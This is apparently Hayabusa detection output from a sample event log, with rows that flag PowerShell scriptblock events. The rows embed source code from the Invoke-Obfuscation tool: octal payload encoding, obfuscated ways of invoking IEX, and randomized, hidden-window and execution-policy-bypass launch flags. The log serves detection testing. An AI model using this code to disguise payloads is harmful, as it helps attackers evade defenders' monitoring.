If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ithout dependencies. 
$InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBoundParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.258 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Create list of random delimiters $RandomDelimiters. 
# Avoid using . * ' "" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax. $RandomDelimiters = @('_','-',',','{','}','~','!','@','%','&','<','>',';',':') # Add letters a-z with random case to $RandomDelimiters. @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') | ForEach-Object {$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar} # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output. $RandomDelimiters = (Get-Random -Input $RandomDelimiters -Count ($RandomDelimiters.Count/4)) # Convert $ScriptString to delimited Octal values in [Char] array separated by random delimiter from defined list $RandomDelimiters. $DelimitedEncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))} # Remove trailing delimiter from $DelimitedEncodedArray. $DelimitedEncodedArray = $DelimitedEncodedArray.SubString(0,$DelimitedEncodedArray.Length-1) # Create printable version of $RandomDelimiters in random order to be used by final command. $RandomDelimitersToPrint = (Get-Random -Input $RandomDelimiters -Count $RandomDelimiters.Length) -Join '' # Generate random case versions for necessary operations. 
$ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ToInt16 = ([Char[]]'[Convert]::ToInt16(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax. $RandomDelimitersToPrintForDashSplit = '' ForEach($RandomDelimiter in $RandomDelimiters) { # Random case 'split' string. $Split = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomDelimitersToPrintForDashSplit += ('-' + $Split + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimiter + ""'"" + ' '*(Get-Random -Input @(0,1))) } $RandomDelimitersToPrintForDashSplit = $RandomDelimitersToPrintForDashSplit.Trim() # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' $RandomConversionSyntax += $ToInt16 + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomStringSyntax + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $EncodingBase + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray = @() $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'."" + $Split + ""("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $RandomDelimitersToPrint + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DelimitedEncodedArray + ""'"" + ' '*(Get-Random -Input @(0,1)) + $RandomDelimitersToPrintForDashSplit + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate random JOIN syntax for all above options. 
$NewScriptArray = @() $NewScriptArray += (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray += $Join + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) $NewScriptArray += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + (Get-Random -Input $BaseScriptArray) + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.262 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedOctalCommand { <# .SYNOPSIS Generates octal encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedOctalCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedOctalCommand encodes an input PowerShell scriptblock or path as an octal payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. 
.PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NonInteractive -NoProfil ""( '127f162f151X164B145f55R110_157@163{164f40n47{110R145{154R154f157{40X127B157{162X154f144L41f47R40L55n106{157{162f145@147X162@157X165n156f144L103L157L154_157f162_40L107f162R145f145f156f73_40@127<162_151{164_145{55B110<157X163f164X40X47_117{142f146_165L163f143@141L164n151_157f156R40_122@157{143X153R163R41_47_40R55R106_157f162f145@147n162{157{165B156X144f103B157{154<157L162<40f107<162<145<145_156'.SPlIt( 'LX@fR_Bn{<' ) |% {( [Char] ([Convert]::ToInt16( ( [String]$_),8 ) )) }) -Join''| Invoke-Expression"" C:\PS> Out-EncodedOctalCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru IEX(-Join (( 127 ,162 ,151 ,164 , 145 , 55 ,110, 157, 163 , 164 , 40,47 , 110 , 145 , 154 ,154 ,157,40 , 127 ,157,162 , 154,144, 41 , 47 , 40 ,55 ,106 ,157, 162 , 145 , 147,162,157, 165,156 ,144, 103, 157 ,154, 157,162, 40,107 ,162 , 145 , 145 , 156,73 , 40,127 ,162, 151,164 ,145,55 , 110 , 157,163,164 , 40 ,47,117 ,142,146, 165 ,163 , 143 ,141, 164,151 , 157, 156,40,122 ,157, 143 , 153, 163,41, 47,40 ,55 ,106 , 157, 162, 145,147, 162 , 157,165, 156 ,144, 103 , 157,154,157 , 162,40, 107, 162,145, 145,156)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])})) .NOTES Inspiration for this encoding technique came from: https://blogs.technet.microsoft.com/heyscriptingguy/2011/09/09/convert-hexadecimal-to-ascii-using-powershell/ This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Encoding base values: 16=Hex, 8=Octal, 2=Binary $EncodingBase = 8 # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = 